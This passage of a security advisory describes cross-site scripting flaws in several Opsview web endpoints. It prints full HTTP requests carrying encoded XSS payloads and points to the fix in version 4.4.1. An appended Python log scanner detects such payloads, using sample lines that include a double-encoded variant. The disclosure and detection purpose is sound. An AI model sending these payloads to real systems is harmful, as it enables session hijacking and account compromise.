/admin/auditlog
/info/host/
/login
/status/service/recheck
/viewport/

There are a variety of iterations within those functions
which may allow a malicious user to trigger a cross site
scripting attack.


III. EXAMPLE

GET /admin/auditlog/?id=1%3cScRiPt%20%3eprompt%28ohnoes%29%3c%2fMY XSS SCRIPT 
HERE%3e HTTP/1.1
Host: 10.20.30.68:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/5.54 (Windows NT 5.1; U)  [en]



GET /info/host/1%3Cdiv%20style=width:expression(prompt(ohnoes))%3E
HTTP/1.1
Host: 10.20.30.68:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/5.54 (Windows NT 5.1; U)  [en]



POST /login HTTP/1.1
Content-Length: 125
Content-Type: application/x-www-form-urlencoded
Host: 10.20.30.68:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/5.54 (Windows NT 5.1; U)  [en]

app=OPSVIEW&back=%22%20onmouseover%3dprompt%28ohnoes%29%20xss%3d%22&login=Sign+in&login_password=no&login_username=no



POST /status/service/recheck HTTP/1.1
Content-Length: 144
Content-Type: application/x-www-form-urlencoded
User-Agent: Opera/5.54 (Windows NT 5.1; U)  [en]

from=%22%20onmouseover%3dprompt%28ohnoes%29%20xss%3d%22&host_selection=opsview&service_selection=opsview%3bConnectivity%20-%20LAN&submit=Submit



GET /viewport/1%3Cdiv%20style=width:expression(prompt(ohnoes))%3E
HTTP/1.1
Host: 10.20.30.68:80
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Opera/5.54 (Windows NT 5.1; U)  [en]


III SOLUTION

Opsview released a fix with Opsview 4.4.1 
http://docs.opsview.com/doku.php?id=opsview4.4:changes#fixes

-- 
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
J. Oquendo
SGFA, SGFE, C|EH, CNDA, CHFI, OSCP, CPT, RWSP, GREM

Where ignorance is our master, there is no possibility of
real peace - Dalai Lama

42B0 5A53 6505 6638 44BB  3943 2BF7 D83F 210A 95AF
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x2BF7D83F210A95AF
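The MobileIron advisory's detection note ("cross site scripting pattern in the regpin field should be detected") and the Opsview requests above describe the same operational check: decode the request target and look for script-bearing patterns in its parameters. The Python below is an added example written for this digest, not code from either vendor or from any of the advisories. The access-log lines are constructed (hosts and timestamps invented, payloads modelled on the ones shown in the two advisories, one of them double-encoded), and the patterns are an illustrative starting set, not a complete ruleset. It decodes every query parameter and path segment repeatedly before matching, because the Opsview examples are percent-encoded and a single decode is easy to slip past.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed access-log lines in combined log format (hosts/timestamps invented).
SAMPLE_LOG = """\
10.0.0.5 - - [28/Oct/2013:10:00:01 +0000] "GET /mifs/c/i/reg/reg.html?regpin=12345 HTTP/1.1" 200 512
10.0.0.6 - - [28/Oct/2013:10:00:02 +0000] "GET /mifs/c/i/reg/reg.html?regpin=12345%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 640
10.0.0.7 - - [28/Oct/2013:10:00:03 +0000] "GET /admin/auditlog/?id=1%3cScRiPt%20%3eprompt%28ohnoes%29%3c/ScRiPt%3e HTTP/1.1" 200 300
10.0.0.8 - - [28/Oct/2013:10:00:04 +0000] "GET /info/host/1%3Cdiv%20style=width:expression(prompt(ohnoes))%3E HTTP/1.1" 200 300
10.0.0.9 - - [28/Oct/2013:10:00:05 +0000] "GET /login?back=%2522%2520onmouseover%253dprompt(1) HTTP/1.1" 200 300
10.0.0.10 - - [28/Oct/2013:10:00:06 +0000] "GET /search?q=scripting+attack+notes HTTP/1.1" 200 300
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Illustrative patterns only; a production ruleset is broader and tuned per application.
XSS_PATTERNS = [
    re.compile(r"<\s*script", re.I),        # script start tag, any case/whitespace
    re.compile(r"\bon[a-z]+\s*=", re.I),    # event handler attribute: onmouseover=, onerror=
    re.compile(r"expression\s*\(", re.I),   # legacy IE CSS expression()
    re.compile(r"javascript\s*:", re.I),    # javascript: URL scheme
]


def fully_decode(value: str, rounds: int = 3) -> str:
    """Undo repeated percent-encoding, stopping once a round changes nothing."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_fields(target: str) -> list:
    """Return (field, decoded value, pattern) for each path segment or
    query parameter of a request target that matches an XSS pattern."""
    parts = urlsplit(target)
    fields = [("path", seg) for seg in parts.path.split("/") if seg]
    fields += parse_qsl(parts.query, keep_blank_values=True)
    hits = []
    for name, raw in fields:
        decoded = fully_decode(raw)
        for pat in XSS_PATTERNS:
            if pat.search(decoded):
                hits.append((name, decoded, pat.pattern))
                break
    return hits


def scan_log(text: str) -> list:
    """Parse each log line and report the requests that carry suspicious fields."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        hits = suspicious_fields(m.group("target"))
        if hits:
            findings.append({"ip": m.group("ip"), "target": m.group("target"), "hits": hits})
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        for field, value, pattern in finding["hits"]:
            print(f"{finding['ip']}  {field}={value!r}  matched {pattern}")
```

A hit means an attempt was logged, not that the application was vulnerable to it; the 200 responses in the sample lines say nothing about whether the payload was reflected. POST bodies (the Opsview `/login` and `/status/service/recheck` cases) never reach an access log, so this check has to sit in a WAF or request-logging layer to see them.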